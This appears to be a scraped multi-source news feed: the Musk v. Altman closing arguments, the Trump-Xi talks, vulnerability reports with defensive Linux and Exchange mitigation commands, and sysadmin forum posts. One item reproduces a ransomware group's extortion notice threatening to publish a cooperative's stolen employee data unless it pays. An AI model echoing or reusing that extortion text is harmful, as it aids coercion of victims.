An anonymous reader quotes a report from Reuters: A lawyer for Elon Musk hammered at the credibility of OpenAI CEO Sam Altman on Thursday, near the end of a trial over whether to hold the ChatGPT maker and its leaders responsible for allegedly transforming the nonprofit into a vehicle to enrich themselves. OpenAI's lawyers fought back, claiming the world's richest person waited too long to claim OpenAI breached its founding agreement to build safe artificial intelligence to benefit humanity, and couldn't claim he was essential to its success. "Mr. Musk may have the Midas touch in some areas, but not in AI," said William Savitt, a lawyer for OpenAI. "To succeed in AI, as it turns out, all Mr. Musk can do is come to court." The claims were made during closing arguments of a trial in the Oakland, California, federal court. [...] In his closing argument, Musk's lawyer Steven Molo told jurors that five witnesses, including Musk, former OpenAI board members and former OpenAI Chief ScientistIlya Sutskever, testified that Altman was a liar. Molo also noted that during cross-examination on Tuesday, Altman did not say yes unequivocally when asked if he was completely trustworthy and did not mislead people in business. "Sam Altman's credibility is directly at issue in this case," Molo said. "If you don't believe him, they cannot win." Molo accused OpenAI of wrongfully trying to enrich investors and insiders at the nonprofit's expense, and failing to prioritize AI's safety. He also challenged Brockman's goals for the business, citing Brockman'sstatementthat his own OpenAI stake was worth nearly $30 billion. "The arrogance, the lack of sensitivity, the failure to account for just common decency is really, really abhorrent." Musk also accused Microsoft, which invested $1 billion in OpenAI in 2019 and $10 billion in 2023, of aiding and abetting OpenAI's wrongful conduct. "Microsoft was aware of what OpenAI was doing every step of the way," Molo said. Sarah Eddy, another lawyer for the OpenAI defendants, accused Musk and his legal team in her closing argument of resorting to "sound bites and irrelevant false accusations." Eddy said by 2017, everyone associated with OpenAI -- including Musk, then still on its board -- knew it needed more money to fulfill its mission than it could raise as a nonprofit. "Mr. Musk wanted to turn OpenAI into a for-profit company that he could control," she said. "But the other founders refused to turn the keys of AGI (artificial general intelligence) over to one person, let alone Elon Musk."She also said if Musk truly believed AI should serve humanity, he would not have pushed to fold OpenAI into his electric car company Tesla, or made his rival xAI a for-profit company. Musk had a three-year statute of limitations to sue, and OpenAI's lawyers said his August 2024 lawsuit came too late because he knew several years earlier about OpenAI's growth plans. Eddy expressed disbelief that Musk claimed he did not read a four-page term sheet in 2018 discussing OpenAI's plan to seek outside investments. "One of the most sophisticated businessmen in the history of the world" wouldn't have "stuck his head in the sand," Eddy said. Savitt accused Musk of having "selective amnesia." Microsoft's lawyer Russell Cohen said in his closing statement that Microsoft wasn't involved in the key events of the case, and was "a responsible partner at every step." On Monday, the nine-person jury is expected to begin deliberating. The judge and lawyers will also return to court to discuss possible remedies if Musk wins, including how OpenAI should be restructured and what damages might be awarded. If Musk loses, there will be no remedies to consider. Recap: OpenAI Trial Wraps Up With 'Jackass' Trophy For Challenging Musk (Day Eleven) Sam Altman Testifies That Elon Musk Wanted Control of OpenAI (Day Ten) Microsoft CEO Satya Nadella Testifies In OpenAI Trial (Day Nine) Sam Altman Had a Bad Day In Court (Day Eight) Sam Altman's Management Style Comes Under the Microscope At OpenAI Trial (Day Seven) Brockman Rebuts Musk's Take On Startup's History, Recounts Secret Work For Tesla (Day Six) OpenAI President Discloses His Stake In the Company Is Worth $30 Billion (Day Five) Musk Concludes Testimony At OpenAI Trial (Day Four) Elon Musk Says OpenAI Betrayed Him, Clashes With Company's Attorney (Day Three) Musk Testifies OpenAI Was Created As Nonprofit To Counter Google (Day Two) Elon Musk and OpenAI CEO Sam Altman Head To Court (Day One) Read more of this story at Slashdot.

Hong Kong’s privacy watchdog has condemned the owner of an education platform for paying a ransom to hackers who stole individuals’ personal data from 9,000 institutions worldwide, arguing that the money should have been spent on strengthening cybersecurity. Privacy Commissioner for Personal Data Ada Chung Lai-ling on Friday also questioned whether the hackers had truly returned the data stolen from Canvas and urged affected users to stay alert for suspicious calls or messages claiming to be...

10 grader och nästan klart i Alingsås under förmiddagen Alingsås Tidning

På fredagen avslutades Donald Trumps besök i Peking och samtalen med Xi Jinping. Kina beskriver besöket som en ”historisk milstolpe”. – Vi har löst en massa olika problem som andra inte skulle ha klarat av, säger Trump, rapporterar Reuters.

Against the backdrop of ceremonial grandeur at the Great Hall of the People on Thursday, US President Donald Trump leaned on centuries of shared history to set the stage for the future of China-US relations. In his state banquet address capping a long day of talks, tourism and toasts, Trump blended calculated callbacks with personal touches – carefully crafted to appeal to the hosts, including President Xi Jinping. He framed the relationship as “one of the most consequential” in world history,...

Turnover soars as Cathay takes off By Jerry Norton This article was first published on May 16, 1986 Cathay Pacific Airways had a memorable take-off in the stock market yesterday, accounting for a massive $446 million worth of turnover, more than the combined value of all other shares traded. The action in the rest of the market was strictly pedestrian, however, as the excitement over Cathay failed to spill over to other shares and the Hang Seng index dropped 27 points. In volume terms, 86.6...

Nya hyresvärden vill lyfta centrala bostadsområdet Alingsås Tidning

Article URL: https://discuss.grapheneos.org/d/35428-recaptcha-mobile-verification-is-bringing-the-play-integrity-api-to-desktops Comments URL: https://news.ycombinator.com/item?id=48143997 Points: 57 # Comments: 30

Nya ägare till villa för 3 230 000 kronor i Alingsås Alingsås Tidning

Hus på 140 kvadratmeter sålt i Alingsås – priset: 5 750 000 kronor Alingsås Tidning

The meeting with the British monarch was Te Arikinui's first since she became Maori Queen in 2024.

As a senior policymaker ponders whether all South Koreans should enjoy an ‘AI dividend’

The reported visit to Havana came after the US renewed an offer of aid to ease the effects of its oil blockade.

Article URL: https://tmctmt.com/posts/mullvad-exit-ips-as-a-fingerprinting-vector/ Comments URL: https://news.ycombinator.com/item?id=48143880 Points: 355 # Comments: 193

A maximum-severity zero-day vulnerability in Cisco Catalyst SD-WAN Controller is being actively exploited in the wild, allowing unauthenticated remote attackers to fully bypass authentication and seize administrative control of enterprise network infrastructure. Tracked as CVE-2026-20182 with a CVSS score of 10.0, the flaw puts SD-WAN deployments across on-premises, cloud, and government environments at critical risk. […] The post Cisco Catalyst SD-WAN Controller 0-Day Actively Exploited to Gain Admin Access appeared first on Cyber Security News.

Dell confirms its SupportAssist software causes Windows BSOD crashes Public confirmation from Dell didn't come until 12 hours after we had pushed a fix internally. It took one replaced laptop and multiple hours of after-hours troubleshooting with frustrated employees to get to the bottom of this one. Admittedly had I looked harder at the logs, I would have seen the SupportAssist critical failure, but having been a hectic MSP week my brain processed it as SupportAssist detecting a problem prior to the crash, rather than being the cause. First ticket comes in with BSOD every 37 minutes on the dot -- chkdsk, dism, sfc, the works don't fix it, so we replace with plans to reimage later. Second ticket comes in much later in the day, "computer rebooting every 30 minutes!" "Oh no" Before I could get a chance to even check the second ticket we get a wave of employees reporting the same thing, expressing that it had been happening all day. At this point pattern recognition kicks in and I recognize there must be something pushing, like a bad Windows Update or Dell Command Driver Update. I take my time running through all of those, running Windows built in reinstall, the works -- nothing. After the failed windows reinstall and a beer later I go back to the error logs and start comparing devices. 0xEF_DellSupportAss_BUGCHECK_CRITICAL_PROCESS_c0000005_DellSupportAss!unknown_function That's gotta be fuckin it right? Let's just wipe Dell SupportAssist entirely and see how it goes. 38 minutes later? Computer is still online. Lets gooooo. Fuck you Dell. I haven't forgotten about your failure to fix the bios issues causing crashing with specific Nvidia cards on your XPS 8930, and I won't forget this. Lenovo is looking pretty juicy. submitted by /u/Zromaus [link] [comments]

I'm looking for a good way for our helpdesk to verify a user's identity prior to completing a password reset. In my past life, we had Duo, and this was a native feature. At my current gig, we use Microsoft Authenticator. I'm trying to find a way to send push notifications via the Microsoft Authenticator app. I spent a good bit of time trying to replicate the approach shown here (https://www.cyberdrain.com/automating-with-powershell-sending-mfa-push-messages-to-users/), but it's a few years old and relies on a lot of deprecated methods. Also, it seems more geared towards MSPs with delegated tenant access, which I am not. Has anyone found a way to implement something like this lately? Or if not, does anyone have suggestions for a better way to go about the key goal of verifying end users prior to password resets? submitted by /u/cheesehead1996 [link] [comments]

Misstänkta drönare rörde sig över Nyland i södra Finland under fredagsmorgonen. Helsingfors flygplats stängdes för all trafik, men är igång igen, enligt Finavia, då räddningsväsendet meddelat att faran nu är över.

Is there a way to prevent Copilot from running? submitted by /u/soldieroscar [link] [comments]

Natos utrikesministrar samlas i veckan i Helsingborg. Det är det första ministermötet i Sverige sedan inträdet i alliansen, samtidigt som relationen mellan USA och Europa beskrivs som ovanligt dålig.Utrikesminister Maria Malmer Stenergard säger att läget är allvarligt och betonar att Nato måste hålla ihop.”Min målsättning med det här mötet är att bidra till sammanhållningen och enigheten i alliansen”, säger hon.

This is part of the dirtyfrag family, but is different enough to warrant its own CVE. https://www.bleepingcomputer.com/news/security/new-fragnesia-linux-flaw-lets-attackers-gain-root-privileges/ Known as Fragnasia and tracked as CVE-2026-46300, this security flaw stems from a logic bug in the Linux XFRM ESP-in-TCP subsystem that can enable unprivileged local attackers to gain root privileges by writing arbitrary bytes to the kernel page cache of read-only files. Immediate patching if you cannot update: rmmod esp4 esp6 rxrpc printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.confrmmod esp4 esp6 rxrpc printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf submitted by /u/NoDistrict1529 [link] [comments]

Following Dirty Frag, Fragnesia, and other Linux kernel vulnerabilities making themselves known in recent days, the latest now is ssh-keysign-pwn...

Japan’s ruling Liberal Democratic Party is weighing a sharp rise in defence spending as pressure from US President Donald Trump and deteriorating regional security conditions force Tokyo to reassess how much it must do to protect itself. The party is expected to debate raising outlays to as much as 5 per cent of gross domestic product, a level that would bring Japan in line with many Nato member states and mark another major shift for a country that had long kept defence spending close to 1 per...

Hong Kong is in a unique position to capitalise on yacht tourism – with over 1,000km of coastline and more than 200 islands, this natural advantage is something few international cities can match. Recent policy initiatives, ranging from new mooring developments to cross-boundary integration within the Greater Bay Area, signal the government’s clear intent to further promote the marine economy. Plans to add over 1,100 new berths and expand key sites, such as the Aberdeen typhoon shelter and the...

A 70-year-old woman has died in a fire at a Hong Kong flat, with police suspecting it was caused by a malfunctioning air-conditioner. The blaze broke out at Yu Tung Court’s Hei Tung House in Tung Chung on Friday, with police saying they received reports from several residents at around 4.42am. “A woman was certified dead at the scene and her body was found when firefighters arrived,” a police spokesman said, adding that around 300 people had to be evacuated. “Some residents said they saw black...

United Quality Cooperative provides a range of services including bulk fuel, propane, lubricants, and agricultural products. We have at our disposal internal corporate correspondence, financial documents, personal data of company employees and much more. All stolen information will be published in the public domain in a week, if the company's management does not pay.

A doctor was sentenced to 18 months’ jail on Thursday for administering a substance to a woman as part of an aesthetic treatment that killed her. The ethylenediaminetetraacetic acid (EDTA) was administered too quickly and at too high a concentration, causing 31-year-old Lau Li Ting to develop EDTA toxicity, which led to cardiac arrest and death. Dr Chan Bingyi later concealed the fact that he had administered EDTA to the victim from her family, paramedics and doctors, in what the judge said was...

Article URL: https://writing.antonleicht.me/p/cut-off Comments URL: https://news.ycombinator.com/item?id=48143284 Points: 138 # Comments: 108

Article URL: https://www.theembeddedrustacean.com/uferris Comments URL: https://news.ycombinator.com/item?id=48143256 Points: 20 # Comments: 3

China has unveiled its latest photonic quantum computer, Jiuzhang 4.0, with researchers saying it can outperform the world’s fastest classical supercomputer by a vast margin, further strengthening Beijing’s push towards quantum supremacy. The results, published on May 13 in the peer-reviewed journal Nature, mark the latest milestone in China’s rapidly advancing quantum programme led by a team of scientists at the University of Science and Technology of China headed by Chinese quantum physicist...

A young Chinese man has gone viral for making and selling fried rice wearing a suit at a night market, making 50,000 yuan (US$7,400) a month. The man, surnamed Lu, began running the stall in Yantai in eastern China’s Shandong province when he was 17 and has now become the “backbone” of his family. To look more “decent”, on a whim, he decided to don a suit one day while cooking the fried rice. Lu, now 19, often strikes stylish poses while cooking, such as slicking back his hair, winking at the...

Trots att Irankonflikten fortsätter har europeiska försvarsbolag backat kraftigt.Men det ska inte tolkas som att investerare räknar med en fredligare värld framöver, eller att efterfrågan på vapen kommer att minska.De fallande aktiekurserna har andra orsaker, säger Robert Vicsai som är försvarsfondförvaltare på SEB.

A Taiwanese student experimenting with software-defined radio technology shut down three bullet trains for nearly an hour, leading to an anti-terrorism response.

Microsoft first started opening up access to Claude Code in December, inviting thousands of its own developers to use Anthropic's AI coding tool daily. It was part of an effort to get project managers, designers, and other employees to experiment with coding for the first time, and sources tell me that Claude Code has proved […]

This live article is freely available to our registered users. Please log in or create an account below. Unrivalled Xi-Trump summit analysis: get real-time updates and exclusive boots-on-the-ground reporting from our Beijing and Washington bureaus. Subscribe now with great savings to stay ahead. On Friday, the final day of his Beijing trip, US President Donald Trump met his Chinese counterpart Xi Jinping, this time over tea and a working lunch. Trump arrived in the Chinese capital on Wednesday...

Efter att räddningstjänsten grävt fram fler offer bland rasmassorna i Kiev är antalet döda nu 24 personer, efter Rysslands attacker under torsdagsmorgonen.Under natten mot fredag meddelade guvernören i provinsen Zaporizjzja att explosioner återigen hörts i regionen.De massiva attackerna mot ukrainska städer har i princip pågått oavbrutet sedan i onsdags.

Valve's new Steam Controller, which began shipping earlier this month for $99 USD, is a great piece of hardware. This high-end gaming controller is great hardware wise but what some may not enjoy about it currently is the tight integration with the Steam controller and no native OS drivers currently for use outside of Steam. As a big win today, the widely-used SDL3 gaming software/hardware abstraction library has added support for the new Steam Controller that works outside the confines of Steam...

Lettlands försvarsdepartement uppger att landets luftrum kan ha kränkts natten mot fredagen.

Hey all, I hope this isn't against sub rules. I'm looking for a reasonably priced Ticketing solution that doesn't need to be locally hosted. This is for a small 3-person IT Support team that services ~150-200 end-users at multiple locations. My criteria is customizable status selections for each ticket (Not Started, Awaiting Hardware, Awaiting Network Team, etc) that can be adjusted on our own portal, but also has a customer-facing option to view the date/time/status of their ticket without having to reach out directly to our team. Does anyone have any recommendations or suggestions of online solutions to look into? Ideally the IT team portal could support multiple accounts/logins for ticket management, but this would not be a deal breaker. Thanks in advance. submitted by /u/Apocoflips [link] [comments]

The Greater Manchester mayor faces a messy and bitter by-election battle with Reform UK.

As many of the world's best struggle at the US PGA Championship, Scottie Scheffler - the world's very best - is among a select few to get change out of Aronimink.

The Russkaya Obshina group stages raids to look for activities contravening "traditional Russian values".

Canada’s proposed free-trade agreement with Asean could help the region expand sectors ranging from mining to manufacturing while advancing Ottawa’s push to reduce its dependence on the US, according to analysts, as both sides seek to accelerate economic diversification. Canadian International Trade Minister Maninder Sidhu confirmed to Bloomberg on Tuesday, during a visit to Manila, that Canada was keen to conclude separate pacts with the Association of Southeast Asian Nations and the...

"It could go well or completely wrong, I'm just here for the ride," says song contest hopeful Sam Battle.

Trafikverkets varning: Djur på vägen på E20 Alingsås Tidning

Article URL: https://github.com/rust-lang/rust-forge/pull/1040 Comments URL: https://news.ycombinator.com/item?id=48142650 Points: 77 # Comments: 36

Leicester Comedy Festival says it is committed to paying comedians but waiting on money themselves.

The monarchy’s finances have long been protected by tradition. Now experts say the public are demanding for more transparency

Here's a look at the tech powering the first big IPO of 2026

Eben Upton warns against claims that Artificial Intelligence will destroy vast numbers of computing roles over the coming years.

Long lines stretching across several blocks have formed in Hong Kong as shoppers turned up days ahead of the launch of the “Royal Pop” pocket watches – a collaboration between luxury watchmaker Audemars Piguet and Swatch. A South China Morning Post reporter observed about 50 people queuing in Causeway Bay on Thursday evening, a few metres from the Swatch store on Kai Chiu Road. “If you don’t try, you don’t win,” said one hopeful, who only gave his name as Jackson. “How many opportunities do you...

The UK's Competition and Markets Authority is opening a formal investigation into whether Microsoft's bundling of Windows, Office, Teams, Copilot, and related products harms competition. Engadget reports: "Our aim is to understand how these markets are developing, Microsoft's position within them and to consider what, if any, targeted action may be needed to ensure UK organizations can benefit from choice, innovation and competitive prices," CMA Chief Executive Sarah Cardell said in a statement published by Reuters. She also stressed the importance of the investigation by noting that hundreds of thousands of UK residents use business software and Microsoft products. The organization will take a look into the company's cloud licensing practices. The CMA has stated that the inquiry will conclude by February. At that point, Microsoft could get slapped with a strategic market label. Microsoft says it's "committed to working quickly and constructively with the CMA to facilitate its review of the business software market." A strategic market designation doesn't automatically assume wrongdoing, but will give the CMA more leeway when conducting further interventions. Read more of this story at Slashdot.

Delta Goodrem is now a favourite to win Eurovision, following a spectacular semi-final performance.

The United States cast Israel-Lebanon talks held in Washington ⁠on Thursday as “productive and positive” and a State Department official said more discussions aimed at ending their conflict will continue on Friday. A senior Lebanese official said earlier that Lebanon will demand that US ally Israel cease fire in the face-to-face talks, as Israel and Iran-backed Hezbollah continued to trade blows despite a US-backed truce declared last month. An Israeli government spokesperson said the talks were...

The TeamPCP hacker group is threatening to leak source code from the Mistral AI project unless a buyer is found for the data. [...]

Here's what the biggest tech court case of the year is all about.

Honda revealed prototypes of two new hybrid models, an Accord sedan and the Acura RDX SUV, during its annual business briefing this week, built on a platform that it says will begin launching next year. The RDX was announced earlier this year as Honda's first SUV to feature the next-gen version of its two-motor hybrid […]

Abortion pills are the most common method of terminating pregnancies in the US.

Dynamic EPP is one of the new AMD P-State features in Linux 7.1, but, unfortunately is causing some fallout in early usage of this power-savings related functionality...

https://shkspr.mobi/blog/2026/05/uk-government-kicks-out-pal... Comments URL: https://news.ycombinator.com/item?id=48142251 Points: 147 # Comments: 44

Other than Instructure execs - maybe?

We use Intune for our MDM. Was curious to know how y’all configure your configuration profiles for Windows devices. I guess my main dilemma is that an individual on our security team is pushing us to lump ALL settings of the same policy type into one profile. (Ie, all settings catalog settings in one profile, all administrative templates in one profile). As a way to lessen the amount of profiles that we have. Eg, All edge settings, M365 app settings, chrome settings into one profile. Is this frowned upon? I guess I would create+name them by their purpose/function. This seems like what a lot of orgs do, l based on initial research. submitted by /u/Axelpeach [link] [comments]

Article URL: https://news.vt.edu/articles/2026/05/drought-united-states-la-nina-expert.html Comments URL: https://news.ycombinator.com/item?id=48142193 Points: 188 # Comments: 73

Article URL: https://www.theregister.com/ai-ml/2026/05/14/ontario-auditors-find-doctors-ai-note-takers-routinely-blow-basic-facts/5240771 Comments URL: https://news.ycombinator.com/item?id=48142188 Points: 224 # Comments: 104

Today was closing arguments in the Musk v. Altman trial, and I almost feel bad writing about the unbelievable demolition derby I just witnessed. Steven Molo, Musk's lawyer, stumbled over his words. He at one point called Greg Brockman - a co-defendant - Greg Altman. He erroneously claimed that Musk wasn't asking for money and […]

Article URL: https://antirez.com/news/165 Comments URL: https://news.ycombinator.com/item?id=48142108 Points: 292 # Comments: 107

Tre klara poäng för Södra Härene mot Östadkulle Alingsås Tidning

US President Donald Trump’s landmark visit to China comes as the US-Iran war disrupts global energy supplies, fuels economic uncertainty and adds fresh strain to Washington-Beijing ties. In the latest instalment of a series examining how rivalry, interdependence and geopolitical crises are reshaping the relationship between the two powers, we explore the intensifying US-China legal arms race. For years, global businesses have been struggling to navigate rising trade tensions between the United...

The head of the CIA visited Cuba on Thursday, an extraordinary step-up in contact between Washington and Havana as the communist-run island reels from US pressure, declaring that it was out of oil. John Ratcliffe’s ‌trip appeared to be only the second visit by a CIA director to Cuba since former leader Fidel Castro’s 1959 revolution. Ratcliffe met with Raul Guillermo Rodriguez Castro, grandson of former president Raul Castro, Interior Minister Lazaro Alvarez Casas and the head of Cuban...

AT&T, Verizon, and T-Mobile have agreed in principle to form a joint venture (JV) aimed at reducing U.S. mobile dead zones through satellite connectivity, especially in rural areas and during emergencies when ground networks fail. Here are three of the customer benefits listed by the JV (as highlighted by Droid Life): Fewer coverage gaps: Will nearly eliminate dead zones in the U.S. currently without mobile service, reaching previously unserved areas. Reliable connectivity in emergencies: Redundant connectivity will become available when existing ground-based networks are unavailable due to extreme natural disasters or other unusual disruptions. Improved network performance: Will give customers more consistent performance and simpler access to satellite services across providers. This will speed up feature updates and improve connectivity for everyone, everywhere. "It will still take time for these improvements to be available to customers, but this all seems like a positive step," writes Droid Life's Tim Wrobel. Read more of this story at Slashdot.

The Green Party leader previously told Hackney mayoral candidate Zoë Garbett "you have my vote".

On May 14, 2026, Microsoft disclosed CVE-2026-42897, a reported vulnerability affecting Exchange Outlook Web Access (OWA). An attacker could exploit this issue by sending a specially crafted email to a user. If the user opens the email in Outlook Web Access and certain interaction conditions are met, arbitrary JavaScript can be executed in the browser context. The following on-premises Exchange Server versions are impacted: Exchange Server 2016 (any update level) Exchange Server 2019 (any update level) Exchange Server Subscription Edition (SE) (any update level) Exchange Online is not impacted by this vulnerability. Mitigations Option 1 (recommended): Exchange Emergency Mitigation (EM) Service For customers who have the Exchange EM Service enabled, Microsoft released the automatic mitigation for Exchange Server 2016, 2019 and SE. The mitigation is already published and is enabled automatically. As a reminder – EM Service was released in September 2021 and is enabled by default. More information on this service can be found in Exchange Emergency Mitigation Service (Exchange EM Service) | Microsoft Learn. Customers with EM Service enabled can verify that their servers have applied the mitigation for CVE-2026-42897 (the ID of mitigation is M2.1.x) by doing the following: Follow the steps outlined in the documentation: Viewing Applied Mitigations. To quickly check the status of EM Service and applied mitigations in your organization, you can run Exchange Health Checker script: https://aka.ms/ExchangeHealthChecker. The HTML report will include a section on EEMS check results. Using EM Service is the best way for your organization to mitigate this vulnerability right away. If you have EM Service currently disabled, we recommend you enable it right away. Please note that EM Service will not be able to check for new mitigations if your server is running Exchange Server version older than March 2023 as per this article. To check the exact version of Exchange currently in use, utilize Option 1 or Option 2 mentioned on this page: Exchange Server build numbers and release dates | Microsoft Learn. Option 2: Scripted application of mitigation For customers who are unable to use the EM Service (for example, disconnected or air-gapped environments), we are providing the following process to enable this mitigation: Download the latest version of the Exchange on-premises Mitigation Tool (EOMT) from: https://aka.ms/UnifiedEOMT Apply the mitigation on a per server base or on all servers at once by running the script via an elevated Exchange Management Shell (EMS): Single server: .\EOMT.ps1 -CVE "CVE-2026-42897" All servers: Get-ExchangeServer | Where-Object { $_.ServerRole -ne "Edge" } | .\EOMT.ps1 -CVE "CVE-2026-42897" Known issues when mitigation is applied We are aware of following known issues once CVE-2026-42897 mitigation is applied (using either option above): OWA Print Calendar functionality might not work. As a workaround copy the data or screenshot the calendar you want to print or use Outlook Desktop client. Inline images might not display correctly in the recipients OWA reading pane. As a workaround, send images as email attachments or use Outlook Desktop client. OWA light (OWA URL ending in /?layout=light) does not work properly. Please note that this feature has been deprecated several years ago and is not intended for regular production use. We are aware of the mitigation showing the "Mitigation invalid for this exchange version." in mitigation details. This issue is cosmetic and the mitigation DOES apply successfully if the status is shown as "Applied". We are investigating on how to address this. Addressing the vulnerability permanently Microsoft is working on and will release and announce a security update for impacted versions of Exchange Server in the future. Update will be released for Exchange SE RTM, Exchange 2016 CU23, Exchange Server 2019 CU14 and CU15 (if you are running older CU versions, please update now). Please note that Exchange SE update will be released as a publicly available security update. Exchange 2016 and 2019 updates will be released only to customers who are enrolled in the Period 2 Exchange Server ESU program as per Announcing Period 2 Exchange 2016/2019 Extended Security Update (ESU) program. Period 1 only ESU customers will not receive this update as that ESU program ended in April 2026. Updates to this blog post: 5/14/2026: Added a known issue with OWA Light. 5/14/2026: Added the mitigation ID (M2.1.x) 5/14/2026: Added a known issue with mitigation details displaying incorrect Description. The Exchange Server Team

Article URL: https://www.openvehicles.com/home Comments URL: https://news.ycombinator.com/item?id=48141732 Points: 75 # Comments: 11

The most graphically-impressive first-person shooter made for the Nintendo Switch is $20 off at Best Buy. Right now, you can buy the physical version of Metroid Prime 4: Beyond for $39.99 ($20 off). The game looks surprisingly good on the 2017 hardware, but runs way better on the Switch 2 with the additional $10 upgrade […]

Yesterday, in Musk v. Altman, before the jurors came in, Sam Altman's team passed up what looked - from a distance - like a little league trophy. It was not. Yvonne Gonzalez Rogers had the lawyers read the inscription aloud for the press: "Never stop being a jackass." It's a commemoration OpenAI employees bought for […]

Study suggests "the bias is real but socially constructed, rather than grounded in how women actually sound."

More than 50 employees have reportedly left Elon Musk’s newly merged SpaceXAI since February, raising questions about burnout, leadership changes, talent poaching, and whether liquidity events weakened retention incentives.

In recent years, the Brics grouping has attracted attention as it adds members and positions itself as the voice of the Global South. At a Brics forum held in Beijing last month, officials discussed expanding trade within the grouping. Such initiatives reflect both an impulse to reduce exposure to external shocks linked to the US dollar and a long-term ambition to reshape global finance. These gatherings are as much about signalling intent as delivering substance. Brics wants to be seen as a...

Meta is rolling out new features to its Meta Ray-Ban Display smart glasses, including bringing the ability to write messages just with hand gestures to all users. You'll be able to use the feature in WhatsApp, Messenger, Instagram and with "native Android and iOS messaging," Meta says. The feature, which relies on the Meta Ray-Ban […]

Just started at a small company and got access to our production server for the first time. Ran uptime and got back: up 659 days, 2:02 Is that...normal? Also noticed there's an apt-get update process that's been running since January. Not sure if that's related. What's the standard reboot cadence for prod: every 6 months? Once a year? Thanks! submitted by /u/Mediocre-Cobbler5016 [link] [comments]

Hackers are leveraging a critical authentication bypass vulnerability in the WordPress plugin Burst Statistics to obtain admin-level access to websites. [...]

Article URL: https://github.com/anthropics/claude-for-legal Comments URL: https://news.ycombinator.com/item?id=48141234 Points: 86 # Comments: 78

One little mystery—solved.

Article URL: https://www.ycombinator.com/companies/infracost/jobs/NzwUQ7c-senior-developer-advocate Comments URL: https://news.ycombinator.com/item?id=48141191 Points: 0 # Comments: 0

Hours after a smaller Xbox Cloud Gaming controller appeared online, Brazil's Anatel regulator has also accidentally published images of what appears to be Microsoft's upcoming Xbox Elite 3 controller. Tecnoblog has posted images that show the successor to the Elite 2 controller, with an interchangeable D-Pad, paddles, and two new mysterious buttons. The Elite 3 […]

A growing number of writers are leaving Substack for alternatives most people haven't heard of like Ghost, Beehiiv, Patreon, and Passport. The reason, writes The Verge's Emma Roth, is the "platform's increased focus on social features as well as a pricing model that puts a chokehold on their business." From the report: Sean Highkin, the creator of the NBA-focused publication The Rose Garden Report, tells The Verge that he makes "significantly more money" after switching from Substack to Ghost last April. "When I first joined up, [Substack] gave me a big push and featured me and funneled a lot of traffic to me, which led to a good amount of growth," Highkin says. "But once I wasn't one of the 'new recruited talent' they could tout, they stopped featuring me and I saw my growth stagnate." Highkin now pays $2,052 per year using Ghost and an add-on called Outpost, compared to $4,968 per year on Substack. The Rose Garden Report's subscriber base has grown 22 percent since the end of 2024, Highkin says. [...] Substack launched in 2017 as a platform that allows writers to create their own newsletters and manage paying subscribers. Unlike some of its biggest rivals, Substack takes a 10 percent cut of total subscription revenue. That tax may not seem substantial at first, but it quickly adds up as creators gain subscribers and begin charging more for their subscriptions. A calculator on Substack's own website estimates that for a newsletter charging $10 per month with 400 subscribers, the total monthly cost -- including the platform's 10 percent cut and credit card processing fees -- would add up to $636. That cost jumps to $15,900 per month with 10,000 subscribers and skyrockets to $79,500 per month for 50,000 members -- nearly $1 million per year. Many Substack rivals charge a flat monthly fee, rather than a commission. Ghost, an open-source platform for blogs and newsletters, starts at $15 per month with 1,000 members for website creation, email newsletter capabilities, and a custom domain. Beehiiv, a creator platform with tools for launching a newsletter, website, and podcast, is free for up to 2,500 subscribers with limited access to certain features, like a built-in ad network, while its other plans vary in price based on subscriber count. A person with 10,000 subscribers, for example, will pay $96 per month for Beehiiv's "Scale" plan. There's also Kit, a newsletter platform that offers a tiered pricing model similar to Beehiiv, costing $116 per month with 10,000 subscribers on its "Creator" plan. It's not just the 10% fee critics are complaining about; they also argue the platform offers limited customization and third-party integrations compared to some of the mentioned alternatives, heavily promotes its own branding and social features, and makes creators more dependent on its ecosystem. Beehiiv founder Tyler Denk argues that creators should be able to build their own brands without the platform taking center stage: "We don't want to take credit for the work of our content creators." While writers can export subscribers, content, and some payment relationships, they cannot take Substack "followers" or Apple-managed iOS billing data with them. Read more of this story at Slashdot.

The update gives users enhanced flexibility over how they can manage their workflows.

The acquisition looks to boost visibility into third-party ecosystems, which are becoming a bigger concern as vectors for supply chain attacks.

Tens of thousands of Israeli celebrants have marched through the area captured by Israel in the 1967 Arab-Israeli war.

60% of evaluated AI Scribe systems mixed up prescribed drugs in patient notes, auditors say

Brazil’s government expressed concern over China’s renewal of US beef import licences, warning the move could reshape competition in the country’s largest meat export market. A senior Brazilian government official told the South China Morning Post that the renewal brought “anxiety” to the sector and could affect domestic cattle prices. China is Brazil’s largest beef market, and the quota system already reduces the country’s competitiveness, the official said. The comments came after Bloomberg...

Hardware company Atech raised $800,000 in pre-seed funding, including from a16z’s scout fund, Sequoia Scout Fund, and Nordic Makers.

Article URL: https://www.synacktiv.com/en/publications/exploiting-the-tesla-wall-connector-from-its-charge-port-connector-part-2-bypassing Comments URL: https://news.ycombinator.com/item?id=48140953 Points: 94 # Comments: 40

Political turmoil continued in Westminster on Thursday after Health Secretary Wes Streeting resigned Starmer's government saying he had "lost confidence" in his leadership.

Ett amerikanskt regeringsflygplan har setts lämna Kubas huvudstad Havanna, bara dagar efter att Donald Trump sagt att USA och Kuba ”ska samtala” med varandra. Det rapporterar Reuters.

Article URL: https://twitter.com/tdietterich/status/2055000956144935055 Comments URL: https://news.ycombinator.com/item?id=48140922 Points: 483 # Comments: 150

In January, Colorado lawmakers introduced a proposal to make operating systems collect users' ages and pass them to app developers. The bill, SB26-051, had clearly been designed for commercial platforms like iOS and Android - one of numerous plans to age-gate the internet through users' devices. It was intended to provide information that would let […]

This is the second time this year a threat actor has leveraged a CVSS 10.0 vulnerability in Cisco's network control system.

Benchmark almost never backs hardware startups. So Eric Vishria dragged his feet 10 years ago before agreeing to hear Cerebras' pitch.

Houston Eye Associates is a team of board-certified ophthalmologists and board-licensed optometrists with advanced fellowship and specialty training in the fields of ophthalmology and optometry. With 20 locations across Greater Houston, there is a location near you.

The prime minister is fighting to stay on in No 10 as heavy election losses trigger a Labour revolt.

A moped had been used in the deadly stray-bullet shooting of a 7-month-old in Brooklyn last month, officials said.

